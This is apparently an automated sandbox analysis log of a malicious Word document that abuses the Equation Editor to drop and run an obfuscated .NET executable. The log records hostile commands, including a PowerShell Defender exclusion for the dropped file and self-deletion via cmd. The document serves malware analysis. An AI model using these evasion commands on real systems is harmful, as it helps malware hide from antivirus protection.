      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Mt83m7kf8vpro8b62h.csSecurity API names: _0020.AddAccessRule
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, JqoaEHn6fskh1axBN5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, JqoaEHn6fskh1axBN5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, JqoaEHn6fskh1axBN5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@13/14@10/3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0095BC3B memset,memset,??2@YAPAXI@Z,CreateThread,GetLastError,CloseHandle,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,MessageBoxW,LocalFree,10_2_0095BC3B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0094B92E CoCreateInstance,10_2_0094B92E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00912890 LoadLibraryExW,FindResourceExW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,10_2_00912890
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$na.docJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD2F7.tmpJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................2.........................s............................................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................2.........................s..............".............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................#2.........................s............................................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................./2.........................s..............".............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................A2.........................s............................................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................M2.........................s..............".............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................3.........................s..............".............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................3.........................s..............".............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........3.........................s.............."..... .......................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................3.........................s..............".............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................3.........................s............................................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................3.........................s..............".............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......3.........................s..............".....$.......................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s..............".............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............................................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s..............".............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............".....2.......................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................<4.........................s..............".............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................N4.........................s....................l.......................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Z4.........................s..............".............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................l4.........................s..............".............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................x4.........................s..............".............................Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: na.docReversingLabs: Detection: 39%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ihbgfbin.exe "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess created: C:\Users\user\AppData\Roaming\ihbgfbin.exe "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
      Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ihbgfbin.exe "C:\Users\user\AppData\Roaming\ihbgfbin.exe"Jump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe"Jump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess created: C:\Users\user\AppData\Roaming\ihbgfbin.exe "C:\Users\user\AppData\Roaming\ihbgfbin.exe"Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ihbgfbin.exe"Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: credui.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptui.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
      Source: na.LNK.0.drLNK file: ..\..\..\..\..\Desktop\na.doc
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
      Source: na.docStatic file information: File size 1189943 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: wntdll.pdb source: ihbgfbin.exe, ihbgfbin.exe, 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000000A.00000003.429889200.0000000002100000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000000A.00000002.928676089.0000000002410000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000A.00000003.429589348.0000000001FA0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mstsc.pdb source: ihbgfbin.exe, 00000007.00000002.429868517.0000000002770000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Mt83m7kf8vpro8b62h.cs.Net Code: xtgDCsAqI4 System.Reflection.Assembly.Load(byte[])
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Mt83m7kf8vpro8b62h.cs.Net Code: xtgDCsAqI4 System.Reflection.Assembly.Load(byte[])
      Source: 5.2.ihbgfbin.exe.6f0000.0.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
      Source: 5.2.ihbgfbin.exe.3510770.4.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Mt83m7kf8vpro8b62h.cs.Net Code: xtgDCsAqI4 System.Reflection.Assembly.Load(byte[])
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00943AE1 LoadLibraryW,GetProcAddress,FreeLibrary,10_2_00943AE1
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F478D push esi; ret 2_2_008F478F
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008EC3E2 push A0008EC4h; ret 2_2_008EC3F5
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008E01F4 push eax; retf 2_2_008E01F5
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F4726 push ebx; ret 2_2_008F4727
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008EA43A push eax; iretd 2_2_008EA505
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008E8F59 push eax; retf 2_2_008E8F61
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001B6C22 push esp; retn 0016h5_2_001B6C2D
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D6DFA1 push ecx; ret 7_2_00D6DFB4
      Source: C:\Windows\explorer.exeCode function: 9_2_082049B5 push esp; retn 0000h9_2_08204AE7
      Source: C:\Windows\explorer.exeCode function: 9_2_08204B02 push esp; retn 0000h9_2_08204B03
      Source: C:\Windows\explorer.exeCode function: 9_2_08204B1E push esp; retn 0000h9_2_08204B1F
      Source: C:\Windows\explorer.exeCode function: 9_2_08CE09B5 push esp; retn 0000h9_2_08CE0AE7
      Source: C:\Windows\explorer.exeCode function: 9_2_08CE0B02 push esp; retn 0000h9_2_08CE0B03
      Source: C:\Windows\explorer.exeCode function: 9_2_08CE0B1E push esp; retn 0000h9_2_08CE0B1F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00968B01 push ecx; ret 10_2_00968B14
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022ADFA1 push ecx; ret 10_2_022ADFB4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0009718C push ss; ret 10_2_00097194
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0009D485 push eax; ret 10_2_0009D4D8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0009D4DB push eax; ret 10_2_0009D542
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0009D4D2 push eax; ret 10_2_0009D4D8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0009D53C push eax; ret 10_2_0009D542
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00085788 push 00000010h; iretd 10_2_0008578A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00097C3F push esp; iretd 10_2_00097C40
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00094FC8 push ecx; iretd 10_2_00094FC9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0204EB02 push esp; retn 0000h10_2_0204EB03
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0204EB1E push esp; retn 0000h10_2_0204EB1F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0204E9B5 push esp; retn 0000h10_2_0204EAE7
      Source: 4q0pGnqqpgTTSL7[1].exe.2.drStatic PE information: section name: .text entropy: 7.951532410536774
      Source: ihbgfbin.exe.2.drStatic PE information: section name: .text entropy: 7.951532410536774
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, l6vWB1e3QQcGjD0U0Q.csHigh entropy of concatenated method names: 'nLDXrSfaYq', 'leuXV8mmNy', 'iItXBVa0HV', 'FuAXmyAaOt', 'zEhXnHS8En', 'VfHX3mfT1L', 'eyqXWws3Dm', 'GHMXlNUvG2', 'LmKXQJaGdT', 'zaMXw4wlVW'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, YkqmWPwHXT1Dof8HBx.csHigh entropy of concatenated method names: 'yWFCVw3Rt', 'XqUHLSCPP', 'tSOsORfNr', 'TVPInSPwv', 'cgQcQjZRt', 'Mky1bOaYS', 'kcgEyVoZVZ3VkawcSd', 'V95SNOZM5cm3k5salw', 'BsQNbKMjw', 'V8oiTjqYe'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Mt83m7kf8vpro8b62h.csHigh entropy of concatenated method names: 'inVt8F93bk', 'bgGt5LcLk4', 'cKJtJTLSXc', 'PFXt0HXmSk', 'AlOtbLZmhs', 'P4jtdgsOjq', 'aiItpmGEQE', 'xQKtfJSCqZ', 'KPGtRnn9jX', 'wPHtxH1txn'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, RAPiKAbihyERmIJCsAy.csHigh entropy of concatenated method names: 'atCTZMFO6H', 'qgsTOmTEow', 'znOTCNICfc', 'XtCTHjtFSE', 'MUoTUejfF1', 'WkDTsCYwVl', 'QX5TIubLp8', 'ABfTkJ2vbO', 'ufHTc99gSv', 'oOJT1a5hnV'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, zk9ouufXnNX6cgGtFt.csHigh entropy of concatenated method names: 'cf4p5glQSR', 'mwYp0qqjkV', 'WZWpdWYIaS', 'dkwdaxmbMN', 'dgAdzMqUN9', 'AGppKAjESQ', 'F1KpME32sW', 'n2RpY9IKtM', 'NeCptQGboO', 'S7mpDpI4L4'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, VKswYFpqvvXi8LFXCK.csHigh entropy of concatenated method names: 'GfU9PnWF2D', 'l099aJjEhr', 'PkANKRsInv', 'v7dNM3vfAh', 'JMt9S5BUQ6', 'Hq79VdI6NW', 'lAl9qjhgpl', 'rMc9BaXpcr', 'IWM9mk1ufm', 'N4H9o5H7II'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, ct6qfC6iAWScj7P1qt.csHigh entropy of concatenated method names: 'hSKbU0v7dg', 'JudbIq7aam', 'yFI03IwsRw', 'kvx0WVWD12', 'lrH0lMYEV9', 'HGM0QZd6aG', 'Nwa0wjqQc2', 'IoH06R84VJ', 'zxj0yvWnCM', 'HLL0rgiTn9'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, lTEVKZLOPxSw8XSL4K.csHigh entropy of concatenated method names: 'ToString', 'J0SAS2c5BB', 'tnVAnbehY6', 'ROGA30CrtT', 'nvbAWxlUys', 'XT3AlYPxPO', 'wenAQpPBju', 'KvQAwYCblR', 'mtSA62flFH', 'X5eAyr66Uu'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, GIOroEDHEHdCvcU7Zj.csHigh entropy of concatenated method names: 'AIAMpxyx0T', 'iFqMfGCbcq', 'vuyMxy3ViX', 'o1qMhfJ1RT', 'hnoMXLAJif', 'iPyMAnmT0K', 'pj48kAM3oL39itSlvL', 'MNWGxr5wuBC8topnfP', 'xDwMMFoRx8', 'cs4Mt3luO5'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, fDAJsxI6uXNBMy6W6j.csHigh entropy of concatenated method names: 'U9GN5ainQT', 'UweNJDOOAG', 'V9pN0jPlYG', 'tvmNbfRwN8', 'ln0Nd7lQgG', 'mEaNpyE2CU', 'E6FNfcjBxs', 'NPNNRVSol1', 'TWKNxmdpML', 'Y5PNhmYniu'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, LI1KLjNtJ7u9Tw5Jqk.csHigh entropy of concatenated method names: 'xi6d8skQJZ', 'EaXdJeJO2D', 'GTpdbIAkb4', 'PUZdpMJKs5', 'AAOdfvktr5', 'o9tbeXNZT4', 'MgIbEPLUeF', 'MJ4bGravCp', 'AO5bPdnOsk', 'y2ibjMxCrI'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Ha0q5Nb1yqlsjQJRPS7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OsSiBLhpwA', 'FGUimvEBfr', 'nxdioXJP80', 'f1QiLAtcRe', 'rgyieyYlZD', 'Q9TiElYdXi', 'tQxiG9clEa'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, x4VJgm7ynwtCPvJCyj.csHigh entropy of concatenated method names: 'p9aTM44Wt5', 'L46Tt4lBIy', 'QWsTD6IkXF', 'AVtT5gn0mO', 'qZYTJ4YPDT', 'xfiTbZjs00', 'HBcTdTI1rG', 'CBvNG8TZiD', 'qQLNPd4nNT', 'cqONjWnV29'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, EwFFCXjNncBSPwukAV.csHigh entropy of concatenated method names: 'Dispose', 'aBuMj8vdZ5', 'JPCYnss4xH', 'zrI445sHjP', 'mU9ManZwwD', 'kwtMzUfN6U', 'ProcessDialogKey', 'c9GYKEc1bh', 'OXmYMf7p7w', 'eLsYY9qxCW'
